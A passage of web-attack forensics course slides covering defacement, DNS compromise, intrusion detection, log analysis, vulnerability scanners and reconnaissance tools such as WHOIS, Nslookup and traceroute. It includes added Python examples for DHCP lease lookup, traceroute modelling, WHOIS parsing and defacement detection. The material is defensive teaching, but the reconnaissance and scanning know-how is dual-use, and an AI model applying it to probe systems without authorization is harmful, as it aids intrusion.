• Luring the legitimate user (insider) and gaining credentials
• Exploiting implementation and design errors

Page 47: File000143


Web Page Defacement (cont’d)

Web page defacement requires write access privileges in the web server root directory

The compromise could come from any security vulnerability, such as Unicode and RPC

Web page defacements are the result of:

• Weak administrator passwords
• Application misconfiguration
• Server misconfiguration
• Accidental permission assignments

Page 48: File000143


Defacement Using DNS Compromise

The attacker can compromise the authoritative domain name server for the web server, redirecting DNS requests for a website to his defaced website

• Web server DNS entry: www.example.com 192.2.3.4
• Compromised DNS entry by the attacker: www.example.com 10.0.0.3
• Now all requests for www.example.com will be redirected to 10.0.0.3

Page 49: File000143


Investigating DNS Poisoning

If you notice that the DNS cache has been corrupted, dump the contents of the DNS server's cache to look for inappropriate entries

On Linux systems, use the BIND command:

• # ndc dumpdb
• Database dump initiated

You can enable DNS logging in named.conf, but it will slow down the performance of the DNS server

Page 50: File000143


Intrusion Detection

Intrusion detection is the art of detecting inappropriate, incorrect, or anomalous activity

It can be used to determine whether a computer network or server has experienced an unauthorized intrusion

Types of Intrusion Detection:

• Host-based Intrusion Detection Systems (HIDS): IDS systems that operate on a host to detect malicious activity on that host
• Network-based Intrusion Detection Systems (NIDS): IDS systems that operate on network data flows
• Intrusion Prevention System (IPS): a system that actively monitors a network or host for attacks and prevents those attacks from occurring

Page 51: File000143


Strategies for Securing Web Applications

Strategies for securing web applications:

• Driving ideas for detection of vulnerabilities
• Fixing previously discovered vulnerabilities
• Pen-testing the application, as it avoids time spent on vulnerability research and analyzing results
• Checking for flaws in security through IDS and IPS tools
• Improving awareness of good security

Page 52: File000143


Investigating Static and Dynamic IP Addresses

The static IP address of a particular host can be found with the help of tools such as NSlookup, Whois, Traceroute, ARIN, and NeoTrace

The DHCP server allocates dynamic IP addresses to the hosts on a network

The DHCP log file stores information regarding the IP address allocated to a particular host at a particular time
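Added Python example, not from the slides, answering the question the DHCP log is kept for: which host held a given dynamic IP address at a given time. The log lines are constructed in the layout of a Windows DHCP server audit log (ID, Date, Time, Description, IP Address, Host Name, MAC Address, with event IDs 10, 11 and 12 for lease assign, renew and release); that layout and those IDs are assumed here and should be checked against the server that produced the real file.

```python
import csv
from datetime import datetime

# Event IDs assumed for the audit-log layout described in the lead-in.
LEASE_EVENTS = {"10": "assign", "11": "renew", "12": "release"}
TIMESTAMP_FORMAT = "%m/%d/%y %H:%M:%S"

# Constructed sample log: the same address is leased to one workstation in the
# morning, released, and re-leased to a different host at noon. The line with
# ID 24 is a non-lease housekeeping event that the parser must skip.
SAMPLE_DHCP_LOG = """\
ID,Date,Time,Description,IP Address,Host Name,MAC Address
24,12/11/04,00:00:00,Database Cleanup Begin,,,
10,12/11/04,06:20:01,Assign,192.168.1.50,ws-finance-07.example.local,00AABBCCDD01
11,12/11/04,09:40:10,Renew,192.168.1.50,ws-finance-07.example.local,00AABBCCDD01
12,12/11/04,11:55:00,Release,192.168.1.50,ws-finance-07.example.local,00AABBCCDD01
10,12/11/04,12:03:22,Assign,192.168.1.50,laptop-guest-3.example.local,00AABBCCDD02
"""


def parse_dhcp_log(text):
    """Return lease events as (timestamp, kind, ip, host, mac), oldest first."""
    events = []
    for row in csv.DictReader(text.splitlines()):
        kind = LEASE_EVENTS.get(row["ID"])
        if kind is None:
            continue  # not a lease event
        when = datetime.strptime(f'{row["Date"]} {row["Time"]}', TIMESTAMP_FORMAT)
        events.append((when, kind, row["IP Address"], row["Host Name"], row["MAC Address"]))
    events.sort()
    return events


def who_had_ip(events, ip, at):
    """Replay the lease events up to the moment 'at' (a string in the log's
    own date/time format) and return (host, mac) holding 'ip' then, or None
    if the address was unassigned. This is the lookup an investigator makes
    when a web log shows an attacking address from the internal DHCP range."""
    cutoff = datetime.strptime(at, TIMESTAMP_FORMAT)
    holder = None
    for when, kind, event_ip, host, mac in events:
        if when > cutoff:
            break
        if event_ip != ip:
            continue
        holder = (host, mac) if kind in ("assign", "renew") else None
    return holder


if __name__ == "__main__":
    leases = parse_dhcp_log(SAMPLE_DHCP_LOG)
    for moment in ("12/11/04 06:00:00", "12/11/04 10:00:00", "12/11/04 11:56:00", "12/11/04 12:10:00"):
        print(moment, "->", who_had_ip(leases, "192.168.1.50", moment))
```

Because the same address changes hands within the day, the time stamp from the web server log must be matched against the lease history, not just the current lease table; a clock offset between the two servers would shift the answer, so record both clocks when collecting the logs.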

Page 53: File000143


Checklist for Web Security

Avoid user accounts having weak or no password

Block unused open ports

Check for various web attacks

Test whether the Unicode vulnerability is present

Check whether IDS or IPS is deployed

Look for possible intrusion areas using vulnerability scanner

Test the website to check whether it can handle large loads and SSL if it is an e-commerce website

Document the list of techniques, devices, policies, or necessary steps that offer security

Page 54: File000143


Statistics 2005-2007

Page 55: File000143


Statistics 2005-2007 (cont’d)

Page 56: File000143


Statistics 2000-2007

Page 57: File000143


Dotdefender (http://www.applicure.com/)

Dotdefender is a web application attack protection tool that blocks attacks that are manifested within the HTTP request logic such as:

• SQL Injection - dotDefender intercepts and blocks attempts to inject SQL statements that corrupt or gain access to the corporate data

• Proxy Takeover - dotDefender intercepts and blocks attempts to divert traffic to an unauthorized site

• Cross-site Scripting - dotDefender intercepts and blocks attempts to inject malicious scripts that hijack the machines of the subsequent site visitors

• Header Tampering - dotDefender identifies and blocks requests containing corrupted header data

• Path Traversal - dotDefender blocks attempts to navigate through the host's internal file system

• Probes - dotDefender detects and blocks attempts to ferret out the system's information

• Known Attacks - dotDefender recognizes and blocks attacks bearing known signatures

Page 58: File000143


Dotdefender (cont’d)

Page 59: File000143


AccessDiver (http://www.accessdiver.com)

Page 60: File000143


AccessDiver: Screenshot

Page 61: File000143


Log Analyzer: Server Log Analysis (http://www.w3.org/)

Server log analysis analyzes server logs by changing the numeric Internet node numbers into domain names with the help of httpd-analyse.c

httpd-analyse.c is the program that helps the server log analysis tool perform its function

Output:

• A version of the log file with the document name simplified (if necessary)
• IP addresses turned into DNS name form

Page 62: File000143


Web Attack Investigation Tools

Analog is a program which analyzes logfiles from WWW servers that can be installed directly on a virtual server

Deep Log Analyzer is an advanced web analytics solution for small and medium size websites

Page 63: File000143


Web Attack Investigation Tools (cont’d)

AWStats is a free web analysis tool that works as a CGI script on the web server or from the command line that generates advanced web, streaming, ftp or mail server statistics, graphically

WebLog Expert is an access log analyzer which gives the information about the site's visitors such as activity statistics, accessed files, and paths through the site, browsers

Page 64: File000143


Web Attack Investigation Tools (cont’d)

AlterWind Log Analyzer Professional is unique web log analysis software

Webalizer is a web server log file analysis program that produces usage statistics in HTML format for viewing with a browser

Page 65: File000143


Web Attack Investigation Tools (cont’d)

eWebLog Analyzer is a web server log analyzer that gives you vital information about your website’s usage that can read log files of the most popular web servers, including Microsoft IIS, Apache, and NCSA

N-Stealth 5 is a web vulnerability scanner that scans for over 18,000 HTTP security issues; N-Stealth HTTP Scanner writes scan results to an easy-to-read HTML report

Page 66: File000143

Web Attack Investigation Tools (cont’d)

Acunetix scans a website, simulating numerous hacking techniques such as SQL injection, cross-site scripting, and Google hacking, in order to identify vulnerabilities in the website

Falcove is used by website owners to see whether their websites are hackable or vulnerable to attacks and to find vulnerabilities before attackers do

Its security audit report shows the severity of the web vulnerabilities found

Page 67: File000143

Web Attack Investigation Tools (cont’d)

AppScan provides security testing throughout the application development lifecycle, including security assurance testing in the development stage

Watchfire AppScan automates web application security audits to ensure the security and compliance of websites

Page 68: File000143

Web Attack Investigation Tools (cont’d)

Emsa Web Monitor is a small web monitoring program that runs on the desktop and allows the user to monitor uptime status of several websites

WebWatchBot is monitoring and analysis software for websites and IP devices, with Ping, HTTP, HTTPS, SMTP, POP3, FTP, port, and DNS checks

Page 69: File000143

Web Attack Investigation Tools (cont’d)

Paros is a Java-based web application security assessment tool that is used to intercept and modify all HTTP and HTTPS data between the server and the client, including cookies and form fields

HP WebInspect performs web application security testing and assessment for web applications

Page 70: File000143

Web Attack Investigation Tools (cont’d)

KeepNI keeps an eye on the website's functionality and ensures that your site is up and fully functional at all times

Wikto checks for flaws in web servers and also offers web-based vulnerability scanning

Page 71: File000143

Web Attack Investigation Tools (cont’d)

Mapper maps the files, file parameters, and values of any site you wish to test. To use it, browse the site as a normal user while recording the session with Achilles (Mapper supports other proxies as well), then run Mapper on the resulting log file

N-Stalker is a web application security scanner that offers a complete suite of web security assessment checks to enhance the overall security of web applications against vulnerabilities and attacks

Page 72: File000143

Web Attack Investigation Tools (cont’d)

Scrawlr is an HP tool that crawls a website and audits it for SQL injection vulnerabilities

Exploit-Me is a suite of web application security testing tools that integrate directly with Firefox and test for web application vulnerabilities

Page 73: File000143

Web Attack Investigation Tools (cont’d)

WebAgain protects a website and automatically repairs the content damaged by attackers

UV Uptime Website Defacement Detector detects defacement of a website

Page 74: File000143

Tools for Locating IP Address

Page 75: File000143

Tools for Locating IP Address

Hide Real IP is a tool that hides the user's IP address for anonymous Internet access; a fake IP address appears instead of the real one

whatismyip is a tool that reveals the user's real Internet IP address

Page 76: File000143

Tools for Locating IP Address (cont’d)

IP Detective Suite is an IP monitoring program that reports a changed IP address to the user's FTP site or to an e-mail address

Enterprise IP-Address Manager is an application for assigning, cataloging, and maintaining IP addresses and host data for both registered and private TCP/IP-addressed networks

Page 77: File000143

Tools for Locating IP Address (cont’d)

Whois Lookup is an online tool for obtaining information about any website

SmartWhois is a useful network information utility that allows you to look up all the available information about an IP address, hostname, or domain

Page 78: File000143

Tools for Locating IP Address (cont’d)

ActiveWhois is a network tool to find any information about an IP address or Internet domain

LanWhois is a program that helps you find out who registered the domain or site you are interested in, and where and when it was registered

Page 79: File000143

Nslookup

Nslookup is a program for querying Internet domain name servers; it displays information that can be used to diagnose Domain Name System (DNS) infrastructure

It helps to find additional IP addresses if the authoritative DNS server is known from whois

The MX record reveals the IP address of the mail server

Both Unix and Windows come with an Nslookup client

Third-party clients are also available, e.g. Sam Spade

Page 80: File000143

Nslookup: Screenshot

Page 81: File000143

Traceroute (http://www.traceroute.org/)

Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live

It reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs

As each router processes an IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator

Routers with DNS entries reveal the router's name, network affiliation, and geographic location
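The TTL mechanism described above, as an added Python model (not code from the slides or from any traceroute implementation): each router on a constructed path decrements the TTL, the router that brings it to zero answers with ICMP Time Exceeded, and a probe that gets past every router reaches the target, whose closed UDP port answers with ICMP Port Unreachable, which is how traceroute knows it has arrived. The path, the addresses (RFC 5737 ranges) and the router names are constructed; one router deliberately has no DNS entry to show how such a hop appears in the listing.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Hop:
    ip: str
    name: Optional[str]  # reverse-DNS name, None when the router has no PTR record


# Constructed path from the probing host to the target: RFC 5737 documentation
# addresses and hypothetical names; no real network is modelled.
PATH: List[Hop] = [
    Hop("192.0.2.1", "gw.corp.example.net"),
    Hop("198.51.100.9", "core1.isp-a.example"),
    Hop("198.51.100.250", None),                # router without a DNS entry
    Hop("203.0.113.77", "edge3.nyc.isp-b.example"),
]
TARGET = Hop("203.0.113.200", "www.target.example")


def forward_probe(ttl: int, path: List[Hop], target: Hop) -> Tuple[str, Hop]:
    """Model the forwarding plane for one UDP probe.

    Every router on the path decrements the TTL; the router that brings it to
    zero discards the packet and answers with ICMP Time Exceeded.  A probe that
    survives all routers reaches the target, whose unused UDP port answers with
    ICMP Port Unreachable.
    """
    if ttl < 1:
        raise ValueError("TTL must be at least 1")
    for router in path:
        ttl -= 1
        if ttl == 0:
            return ("time_exceeded", router)
    return ("port_unreachable", target)


def traceroute(path: List[Hop], target: Hop, max_ttl: int = 30) -> List[Tuple[int, Hop]]:
    """Send probes with TTL 1, 2, 3, ... and record who answered each one,
    stopping at the first reply that comes from the target itself."""
    hops: List[Tuple[int, Hop]] = []
    for ttl in range(1, max_ttl + 1):
        kind, responder = forward_probe(ttl, path, target)
        hops.append((ttl, responder))
        if kind == "port_unreachable":
            break
    return hops


def format_hops(hops: List[Tuple[int, Hop]]) -> List[str]:
    """Render hops the way a traceroute listing does: name (address) when a
    PTR record exists, the bare address otherwise."""
    return [
        f"{ttl:2d}  {hop.name} ({hop.ip})" if hop.name else f"{ttl:2d}  {hop.ip}"
        for ttl, hop in hops
    ]


def named_hops(hops: List[Tuple[int, Hop]]) -> List[str]:
    """The router names an investigator reads for network affiliation and location."""
    return [hop.name for _, hop in hops if hop.name]


if __name__ == "__main__":
    print("\n".join(format_hops(traceroute(PATH, TARGET))))
```

The model shows why the hop count equals the TTL: a probe with TTL n is discarded by the n-th router, so the listing is built one router per TTL value. Real networks add the cases the model omits, such as routers that rate-limit or never send ICMP (the `* * *` lines) and paths that change between probes.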

Page 82: File000143

Tools for Locating IP Address: NeoTrace (now McAfee Visual Trace)

NeoTrace shows the traceroute output visually: map view, node view, and IP view

Page 83: File000143

Whois (http://www.whois.net/)

Whois is the client utility that communicates with WHOIS servers located around the world to obtain information about domain registration

It supports IP address queries and automatically selects the appropriate Whois server for IP addresses

Page 84: File000143

Whois

Registrant:
   targetcompany (targetcompany-DOM)
   # Street Address
   City, Province
   State, Pin, Country
   Domain Name: targetcompany.COM

Domain servers in listed order:
   NS1.WEBHOST.COM   XXX.XXX.XXX.XXX
   NS2.WEBHOST.COM   XXX.XXX.XXX.XXX

Administrative Contact:
   Surname, Name (SNIDNo-ORG)  [email protected] (targetcompany-DOM)
   # Street Address
   City, Province, State, Pin, Country
   Telephone: XXXXX   Fax: XXXXX

Technical Contact:
   Surname, Name (SNIDNo-ORG)  [email protected] (targetcompany-DOM)
   # Street Address
   City, Province, State, Pin, Country
   Telephone: XXXXX   Fax: XXXXX
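An investigator usually pulls the fields of interest (domain, name servers, contact addresses, registration dates) out of a record like this programmatically. The following parser is an added Python example, not code from the slides or from any whois client; it handles the classic Registrant / Contact / Domain servers layout shown above, and the record it parses is a constructed one whose values are all placeholders (example domains, RFC 5737 addresses, 555 telephone numbers).

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed WHOIS record in the Registrant / Contact / Domain servers layout
# of the slide. Every value is a placeholder; nothing refers to a real registration.
SAMPLE_WHOIS = """\
Registrant:
   targetcompany (targetcompany-DOM)
   123 Example Street
   City, Province
   State, Pin, Country

   Domain Name: TARGETCOMPANY.COM

   Administrative Contact:
      Surname, Name (SNIDNo-ORG)  admin@targetcompany.example
      123 Example Street
      City, Province, State, Pin, Country
      Telephone: +1 555 0100   Fax: +1 555 0101
   Technical Contact:
      Surname, Name (SNIDNo-ORG)  hostmaster@webhost.example
      Telephone: +1 555 0200   Fax: +1 555 0201

   Record last updated on 01-Jan-2008.
   Record expires on 01-Jan-2010.
   Record created on 01-Jan-2000.

   Domain servers in listed order:
      NS1.WEBHOST.COM   192.0.2.53
      NS2.WEBHOST.COM   198.51.100.53
"""

# A section heading is a line consisting only of words and a trailing colon.
SECTION_RE = re.compile(r"^([A-Za-z][A-Za-z ]*[A-Za-z]):$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
NS_RE = re.compile(r"^(?P<name>[A-Za-z0-9.-]+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")
DATE_RE = re.compile(r"^Record (created|expires|last updated) on (\S+?)\.?$")

Sections = Dict[str, List[str]]


def parse_whois(text: str) -> Sections:
    """Group the record into sections: a 'Heading:' line opens a section and
    every following non-blank line belongs to it until the next heading."""
    sections: Sections = {"": []}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
        else:
            sections[current].append(line)
    return sections


def field(sections: Sections, key: str) -> Optional[str]:
    """First 'Key: value' line anywhere in the record (e.g. Domain Name)."""
    pat = re.compile(rf"^{re.escape(key)}:\s*(.+)$", re.IGNORECASE)
    for lines in sections.values():
        for line in lines:
            m = pat.match(line)
            if m:
                return m.group(1).strip()
    return None


def name_servers(sections: Sections) -> List[Tuple[str, str]]:
    """(hostname, address) pairs from the 'Domain servers in listed order' section."""
    out: List[Tuple[str, str]] = []
    for line in sections.get("Domain servers in listed order", []):
        m = NS_RE.match(line)
        if m:
            out.append((m.group("name").lower(), m.group("ip")))
    return out


def contact_emails(sections: Sections) -> Dict[str, List[str]]:
    """E-mail addresses found in each '... Contact' section."""
    return {
        name: EMAIL_RE.findall(" ".join(lines))
        for name, lines in sections.items()
        if name.endswith("Contact")
    }


def record_dates(sections: Sections) -> Dict[str, str]:
    """Creation, expiry and last-update dates, keyed created/expires/last_updated."""
    dates: Dict[str, str] = {}
    for lines in sections.values():
        for line in lines:
            m = DATE_RE.match(line)
            if m:
                dates[m.group(1).replace(" ", "_")] = m.group(2)
    return dates


if __name__ == "__main__":
    s = parse_whois(SAMPLE_WHOIS)
    print(field(s, "Domain Name"), name_servers(s), contact_emails(s), record_dates(s))
```

WHOIS output has no single standard layout; registries and registrars differ in headings, key names and date formats, so a parser like this needs a profile per server, and the name servers it extracts are the natural next input to Nslookup.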

Page 85: File000143

CountryWhois (http://www.tamos.com/)

CountryWhois is a utility for identifying the geographic location of an IP address

It is similar to SmartWhois, but the focus is on IP-to-country identification

Features:

• It analyzes server logs
• It checks e-mail headers
• It identifies online credit card fraud

Page 86: File000143

CountryWhois: Screenshot

Page 87: File000143

IP2country (http://www.ip2country.org/)

IP2country identifies a visitor's geographical location (country, region, city, and ISP) using a proprietary IP address lookup database

Features:

• Real-time IP geolocation detection
• Redirection of web pages based on geographical region
• Fraud detection (credit card fraud etc.)
• Web log statistics and analysis
• Spam filtering

Page 88: File000143

IP2country: Screenshot

Page 89: File000143

CallerIP (http://www.callerippro.com/)

CallerIP shows the user when someone has connected to their computer and reports the connecting IP address

It also runs a trace on that IP address

Features:

• It offers real-time connection monitoring
• It identifies the country of origin for all connections made to your machine
• It provides worldwide Whois reports for any monitored connection

Page 90: File000143

CallerIP: Screenshot 1

Page 91: File000143

Whois.net (http://www.whois.net/)

Whois.net is an online tool for gaining information about any site

Page 92: File000143

Pandora FMS (http://pandorafms.org/)

Pandora FMS is open-source monitoring software

Features:

• It watches your systems and applications
• It lets you know the status of any element of those systems

Pandora FMS detects:

• Defacement of the website
• Whether the network interface is down
• Memory leaks in the server application
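Defacement detection, as offered by UV Uptime Website Defacement Detector and Pandora FMS, and the automatic repair that WebAgain performs, both reduce to comparing a site against a known-good baseline. The following Python block is an added example, not code from any of those products: it hashes every monitored page while the site is known to be good, classifies a later snapshot's differences as modified, missing or unexpected pages, and restores from a golden copy. Both snapshots are constructed dictionaries standing in for HTTP fetches or a document root, and the `ignore_generated_comment` normalizer is an assumed example of how to keep a legitimately dynamic fragment from raising false alarms.

```python
import hashlib
import re
from typing import Callable, Dict, List

Site = Dict[str, str]  # path -> page content

# Constructed known-good site. In a real monitor these bodies come from HTTP
# fetches or from a trusted copy of the document root.
GOLDEN_SITE: Site = {
    "/index.html": "<html><body><h1>Welcome to targetcompany</h1>"
                   "<!-- generated at 2008-10-10 13:00 --></body></html>",
    "/about.html": "<html><body><p>About us</p></body></html>",
    "/contact.html": "<html><body><p>Contact</p></body></html>",
}

# Constructed later snapshot: the front page has been replaced, one page is
# missing, one page was added, and the legitimate timestamp comment changed.
CURRENT_SITE: Site = {
    "/index.html": "<html><body><h1>Site replaced by intruder</h1>"
                   "<!-- generated at 2008-10-11 02:14 --></body></html>",
    "/contact.html": "<html><body><p>Contact</p></body></html>",
    "/new-page.html": "<html><body><p>unexpected content</p></body></html>",
}

Normalizer = Callable[[str], str]
GENERATED_RE = re.compile(r"<!-- generated at [^>]* -->")


def ignore_generated_comment(body: str) -> str:
    """Assumed normalizer: strip a fragment that legitimately changes on every
    render so it does not trigger an alert on its own."""
    return GENERATED_RE.sub("", body)


def fingerprint(body: str, normalize: Normalizer = lambda s: s) -> str:
    return hashlib.sha256(normalize(body).encode("utf-8")).hexdigest()


def take_baseline(site: Site, normalize: Normalizer = lambda s: s) -> Dict[str, str]:
    """Hash every monitored page while the site is known to be good."""
    return {path: fingerprint(body, normalize) for path, body in site.items()}


def check_site(baseline: Dict[str, str], site: Site,
               normalize: Normalizer = lambda s: s) -> Dict[str, List[str]]:
    """Compare a snapshot against the baseline and classify every difference."""
    report: Dict[str, List[str]] = {"modified": [], "missing": [], "unexpected": []}
    for path, digest in baseline.items():
        if path not in site:
            report["missing"].append(path)
        elif fingerprint(site[path], normalize) != digest:
            report["modified"].append(path)
    report["unexpected"] = [p for p in site if p not in baseline]
    for key in report:
        report[key].sort()
    return report


def is_defaced(report: Dict[str, List[str]]) -> bool:
    return any(report.values())


def restore(golden: Site, site: Site, report: Dict[str, List[str]]) -> Site:
    """Repair step: put back modified and missing pages from the golden copy
    and drop files that were never part of the site."""
    repaired = dict(site)
    for path in report["modified"] + report["missing"]:
        repaired[path] = golden[path]
    for path in report["unexpected"]:
        del repaired[path]
    return repaired


if __name__ == "__main__":
    baseline = take_baseline(GOLDEN_SITE, ignore_generated_comment)
    report = check_site(baseline, CURRENT_SITE, ignore_generated_comment)
    print("defaced:", is_defaced(report), report)
```

Two points matter in practice: the baseline and golden copy must be stored where a web server compromise cannot reach them, otherwise the intruder simply re-baselines, and the repair step should run only after the incident has been recorded, since restoring pages also destroys the evidence an investigator needs.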

Page 93: File000143

Pandora FMS: Screenshot

Page 94: File000143

CounterStorm-1: Defense Against Known, Zero Day, and Targeted Attacks

The CounterStorm-1 suite of network security appliances offers the most effective defense against known, zero-day, and targeted attacks

It automatically neutralizes attacks within seconds, preventing costly and widespread damage

It does not require signatures; CounterStorm-1 accurately detects attacks in all IP traffic (TCP, UDP, and ICMP)

It recognizes current attacks and automatically adjusts to future threats

http://www.counterstorm.com

Page 95: File000143

Summary

Cross-site scripting (XSS or CSS) is considered an application-layer hacking technique

SQL injection means passing SQL code that the developer did not write into an application

Cookie poisoning is the process of tampering with the value of cookies

The source, nature, and time of the attack can be determined by analyzing the log files of the compromised system

FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server

Web page defacement requires write access privileges in the web server's root directory

Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity
